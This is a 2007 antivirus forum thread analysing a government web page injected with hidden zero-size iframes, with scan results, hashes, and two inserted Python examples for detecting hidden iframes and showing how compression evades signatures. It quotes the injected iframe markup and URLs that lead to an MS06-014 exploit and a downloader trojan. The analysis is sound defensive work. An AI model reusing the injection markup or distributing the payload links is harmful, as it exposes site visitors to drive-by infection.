[Malware sample] A CPPCC page under the Nanhua County government website has been injected with a drive-by trojan

dikex
Posted on 2007-5-17 10:51:24
Thanks to a forum member passing by for the tip!

——————————————————————————————————————————————————————————————

In this era of drive-by injections ("挂马"), even government websites can't escape: the CPPCC page under the Nanhua County government site, http://www.ynnh.gov.cn/nhzx/Article_Show.asp?ArticleID=78, has been injected!

Several iframes were added at the start of the page source, but in fact there are only two distinct ones; the rest are duplicates:

<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.game1983.com/index.htm width=0 height=0></iframe>

——————————————————————————————————————————————————————————————

http://www.game1983.com/index.htm could not be reached -_-

——————————————————————————————————————————————————————————————

http://www.n85853.cn/index.htm has already turned up several times recently:
<iframe src="http://www.1cdzx.cn" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.1008y.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.wcwcwc.cn/in/1.htm" width="0" height="0" frameborder="0"></iframe>

It has been updated since last time, but really only http://www.wcwcwc.cn/in/1.htm is new; the others still end up running the same ones as last time, the MS06-014 web exploit. It plants one malware file, http://www.wcwcwc.cn/in/1.exe, which not many engines flag, so it counts as new ^_^;

Antivirus           Version          Last update   Result
AhnLab-V3           2007.5.16.1      05.16.2007    no virus found
AntiVir             7.4.0.23         05.16.2007    no virus found
Authentium          4.93.8           05.16.2007    no virus found
Avast               4.7.997.0        05.16.2007    Win32:Singu-Q
AVG                 7.5.0.467        05.16.2007    no virus found
BitDefender         7.2              05.17.2007    BehavesLike:Trojan.Downloader
CAT-QuickHeal       9.00             05.16.2007    (Suspicious) - DNAScan
ClamAV              devel-20070416   05.16.2007    no virus found
DrWeb               4.33             05.16.2007    DLOADER.Trojan
eSafe               7.0.15.0         05.16.2007    Suspicious Trojan/Worm
eTrust-Vet          30.7.3638        05.17.2007    no virus found
Ewido               4.0              05.16.2007    no virus found
FileAdvisor         1                05.17.2007    no virus found
Fortinet            2.85.0.0         05.17.2007    no virus found
F-Prot              4.3.2.48         05.16.2007    no virus found
F-Secure            6.70.13030.0     05.17.2007    W32/Downloader
Ikarus              T3.1.1.7         05.16.2007    no virus found
Kaspersky           4.0.2.24         05.17.2007    no virus found
McAfee              5032             05.16.2007    New Malware.bx
Microsoft           1.2503           05.17.2007    no virus found
NOD32v2             2272             05.17.2007    no virus found
Norman              5.80.02          05.16.2007    no virus found
Panda               9.0.0.4          05.16.2007    Suspicious file
Prevx1              V2               05.17.2007    no virus found
Sophos              4.17.0           05.16.2007    no virus found
Sunbelt             2.2.907.0        05.17.2007    VIPRE.Suspicious
Symantec            10               05.17.2007    Downloader
TheHacker           6.1.6.115        05.15.2007    no virus found
VBA32               3.12.0           05.16.2007    BackDoor.Pigeon.1604
VirusBuster         4.3.7:9          05.16.2007    no virus found
Webwasher-Gateway   6.0.1            05.17.2007    Win32.Malware.gen#PECompact (suspicious)

File size: 104545 bytes
MD5: ac54dd46d51ec1951c3dc2c3b894f099
SHA1: 3ba613040b8c8321a421071c17315b787249a1bd
packers: PECompact
packers: PECOMPACT, ZLIB
packers: PecBundle, PECompact


——————————————————————————————————————————————————————————————

Sample password: virus

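The hidden-iframe check the post performs by reading the page source, as an added example that is not part of the original post: a Python script that parses HTML for iframes whose width or height is 0, resolves their src against the page URL, and follows the chain through an offline map of pages. Only the iframe lines in the map come from the post; the surrounding markup is constructed, and any URL absent from the map is treated as unreachable (which is what the post reports for game1983.com). The function names (find_hidden_iframes, walk_iframe_chain, offline_fetch) are my own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in one document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})


def _is_zero_size(value):
    """True for '0', '0px', '0%' and similar: a dimension that hides the frame."""
    return re.fullmatch(r"\s*0+(?:px|%)?\s*", value or "") is not None


def find_hidden_iframes(html, base_url=""):
    """Return the distinct absolute src URLs of iframes with width or height 0.

    The injected markup uses unquoted attribute values (src=http://...), which
    HTMLParser accepts. Duplicate frames, as seen on the compromised page, are
    reported once.
    """
    parser = _IframeCollector()
    parser.feed(html)
    found = []
    for attrs in parser.iframes:
        src = attrs.get("src", "").strip()
        if not src:
            continue
        if _is_zero_size(attrs.get("width")) or _is_zero_size(attrs.get("height")):
            url = urljoin(base_url, src)
            if url not in found:
                found.append(url)
    return found


def walk_iframe_chain(start_url, fetch, max_depth=5):
    """Follow hidden iframes breadth-first from start_url.

    fetch(url) must return the page's HTML, or None if it cannot be retrieved.
    Returns a dict mapping each visited URL to the list of hidden-iframe URLs
    it embeds, or to None when the page was unreachable.
    """
    visited = {}
    queue = [(start_url, 0)]
    while queue:
        url, depth = queue.pop(0)
        if url in visited or depth > max_depth:
            continue
        html = fetch(url)
        if html is None:
            visited[url] = None
            continue
        children = find_hidden_iframes(html, url)
        visited[url] = children
        queue.extend((child, depth + 1) for child in children)
    return visited


# Constructed offline stand-ins for the pages quoted in the post. Only the
# iframe lines come from the post; the rest of the markup is made up, and any
# URL missing from this map is treated as unreachable.
LANDING = "http://www.ynnh.gov.cn/nhzx/Article_Show.asp?ArticleID=78"
SAMPLE_PAGES = {
    LANDING: (
        "<html><body>\n"
        "<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe>\n"
        "<iframe src=http://www.game1983.com/index.htm width=0 height=0></iframe>\n"
        "<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe>\n"
        '<iframe src="/map/location.htm" width="600" height="400"></iframe>\n'
        "<p>article body</p></body></html>"
    ),
    "http://www.n85853.cn/index.htm": (
        '<iframe src="http://www.1cdzx.cn" width="0" height="0" frameborder="0"></iframe>\n'
        '<iframe src="http://www.1008y.cn/" width="0" height="0" frameborder="0"></iframe>\n'
        '<iframe src="http://www.wcwcwc.cn/in/1.htm" width="0" height="0" frameborder="0"></iframe>'
    ),
    "http://www.wcwcwc.cn/in/1.htm": "<html><body>final stage, no further frames</body></html>",
}


def offline_fetch(url):
    """Offline fetcher over the constructed map; None plays the unreachable host."""
    return SAMPLE_PAGES.get(url)


if __name__ == "__main__":
    for page, children in walk_iframe_chain(LANDING, offline_fetch).items():
        if children is None:
            print(f"{page}: unreachable")
        else:
            print(f"{page}: {len(children)} hidden iframe(s) -> {children}")
```

The visible, normally sized frame on the landing page is left out of the report, the duplicate n85853.cn frame is collapsed to one entry, and the three .cn hosts the post did not fetch show up as unreachable leaves of the chain. Replacing offline_fetch with a real HTTP fetcher should only be done from an isolated analysis host.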
mofunzone
Posted on 2007-5-17 10:58:20
AntiVir misses it; submitted.
File ID          Filename          Size (Byte)         Result
544748          1.exe          101.41 KB          UNDER ANALYSIS
But in practice it's enough to catch this file, because it drops an exe after running; once that one is detected, the whole virus is dead.
File:              x105.rar
Status:            INFECTED/MALWARE
MD5:               3801e22d76bb29fa1e9eac118258d515
Packers detected:  -

Scanner results
Scan taken on 17 May 2007 02:56:14 (GMT)
A-Squared              Found nothing
AntiVir                Found TR/Delphi.Downloader.Gen
ArcaVir                Found nothing
Avast                  Found Win32:Delf-AEM
AVG Antivirus          Found Downloader.Delf.8.BH
BitDefender            Found BehavesLike:Trojan.Downloader (probable variant)
ClamAV                 Found nothing
Dr.Web                 Found nothing
F-Prot Antivirus       Found Possibly a new variant of W32/Downloader-WebExe-based!Maximus
F-Secure Anti-Virus    Found nothing
Fortinet               Found nothing
Kaspersky Anti-Virus   Found nothing
NOD32                  Found a variant of Win32/TrojanDownloader.Delf.NHL
Norman Virus Control   Found nothing
Panda Antivirus        Found nothing
Rising Antivirus       Found nothing
VirusBuster            Found nothing
VBA32                  Found Win32.Trojan.Downloader (http://...) (probable variant)

jlennon
Posted on 2007-5-17 10:59:37

刺猬 should get a Kafan honorary web-page analyst title

[Last edited by jlennon on 2007-5-17 11:00]

mofunzone
Posted on 2007-5-17 11:01:48
Actually, the main reason AntiVir can't detect this virus is zlib.
zlib uses the same compression algorithm as gzip, and AntiVir apparently can't unpack gzip; not sure whether 7zip has improved on this...
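mofunzone's point, that a zlib or gzip layer hides the dropper from a scanner that does not inflate it, as an added example that is not part of the original post and is not any vendor's engine: a toy byte-signature scanner in Python, using a constructed marker string in place of a real signature. It shows the marker found in the raw payload, missed once the payload is wrapped in a zlib or gzip stream, and found again when the scanner inflates each layer before matching. Function names are my own; wbits=47 is zlib's documented setting for auto-detecting zlib or gzip framing.

```python
import hashlib
import zlib

# Constructed stand-in for a scanner's byte signature; not a real AV pattern.
SIGNATURES = {
    "Demo.Downloader.Marker": b"CONSTRUCTED-DEMO-MARKER-NOT-A-REAL-SIGNATURE",
}


def zlib_wrap(payload):
    """Wrap payload in a zlib stream, as a zlib-based packer layer would."""
    return zlib.compress(payload, 9)


def gzip_wrap(payload):
    """Same deflate algorithm, gzip framing (wbits=31 selects the gzip header)."""
    compressor = zlib.compressobj(9, zlib.DEFLATED, 31)
    return compressor.compress(payload) + compressor.flush()


def try_inflate(blob):
    """Inflate one zlib or gzip layer; None if blob is not such a stream.

    wbits=47 (32 + 15) tells zlib to auto-detect either framing.
    """
    try:
        return zlib.decompress(blob, 47)
    except zlib.error:
        return None


def scan(blob, unpack=True, max_layers=3):
    """Match signatures against blob, optionally inflating compressed layers.

    Returns (signature name or None, number of layers inflated before the match).
    max_layers bounds the work a nested stream can force on the scanner.
    """
    current, layers = blob, 0
    while True:
        for name, pattern in SIGNATURES.items():
            if pattern in current:
                return name, layers
        if not unpack or layers >= max_layers:
            return None, layers
        inner = try_inflate(current)
        if inner is None:
            return None, layers
        current, layers = inner, layers + 1


def build_payload():
    """Constructed 'dropper' body: two header bytes, padding, and the marker."""
    return b"MZ" + b"\x00" * 64 + SIGNATURES["Demo.Downloader.Marker"] + b"\x00" * 64


def demo():
    """Run the same scanner over the raw, zlib-, gzip- and doubly-wrapped payload."""
    payload = build_payload()
    packed = zlib_wrap(payload)
    return {
        "raw": scan(payload),
        "packed_no_unpack": scan(packed, unpack=False),
        "packed_unpack": scan(packed),
        "gzip_unpack": scan(gzip_wrap(payload)),
        "two_layers": scan(gzip_wrap(packed)),
        # Hash lists miss the packed file too: different bytes, different digest.
        "md5_changes": hashlib.md5(payload).hexdigest() != hashlib.md5(packed).hexdigest(),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:18} {result}")
```

The deflate bit-packing means the marker never appears verbatim in the compressed bytes, so raw matching fails regardless of which framing (zlib or gzip) the packer used; an engine only recovers the detection by peeling the layer, which is why the post attributes the AntiVir miss to its unpacker rather than to a missing signature.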
dikex (OP)
Posted on 2007-5-17 11:02:16
Originally posted by jlennon on 2007-5-17 10:59:
刺猬 should get a Kafan honorary web-page analyst title

This post was just bait; there's no technical content in it. Of course, if that "analyst" title is the kind that brings perks without any work, I don't mind.
jlennon
Posted on 2007-5-17 11:04:14

The forum is planning a dedicated virus-analysis section, so you'll have somewhere to show your skills.

bjfhj
Posted on 2007-5-17 11:15:29
Start of the scan: 2007年5月17日  11:14

Starting the file scan:

Begin scan in 'D:\My Documents\0[1].htm'
D:\My Documents\0[1].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\0[2].htm'
D:\My Documents\0[2].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\0[3].htm'
D:\My Documents\0[3].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\0[4].htm'
D:\My Documents\0[4].htm
      [DETECTION] Contains signature of the VBS script virus VBS/Dldr.Virgin
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\1[1].htm'
D:\My Documents\1[1].htm
      [DETECTION] Contains signature of the HTML script virus HTML/Dldr.Agent.sef
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\1[2].htm'
D:\My Documents\1[2].htm
      [DETECTION] Contains signature of the HTML script virus HTML/Dldr.Agent.sef
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\1[3].htm'
D:\My Documents\1[3].htm
      [DETECTION] Contains signature of the HTML script virus HTML/Dldr.Agent.sef
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\ban[1].js'
D:\My Documents\ban[1].js
      [DETECTION] Contains signature of the exploits EXP/Ani.Gen
      [INFO]      The file was deleted!
Begin scan in 'D:\My Documents\CA634TEZ.js'
D:\My Documents\CA634TEZ.js
      [DETECTION] Contains signature of the exploits EXP/Ani.Gen
      [INFO]      The file was deleted!


End of the scan: 2007年5月17日  11:15
Used time: 00:08 min
wangjay1980
Posted on 2007-5-17 11:16:15
detected: virus Downloader (modification)        File: C:\Documents and Settings\Owner\桌面\1.rar/1.exe//PE_Patch.PECompact//PecBundle//PECompact
wangjay1980
Posted on 2007-5-17 11:17:38
detected: virus Downloader (modification)        File: C:\Documents and Settings\Owner\桌面\x105.rar/x105.exe
buycard
Posted on 2007-5-17 11:45:45
Quite a few AVs can detect x105.
Copyright © KaFan  KaFan.cn All Rights Reserved.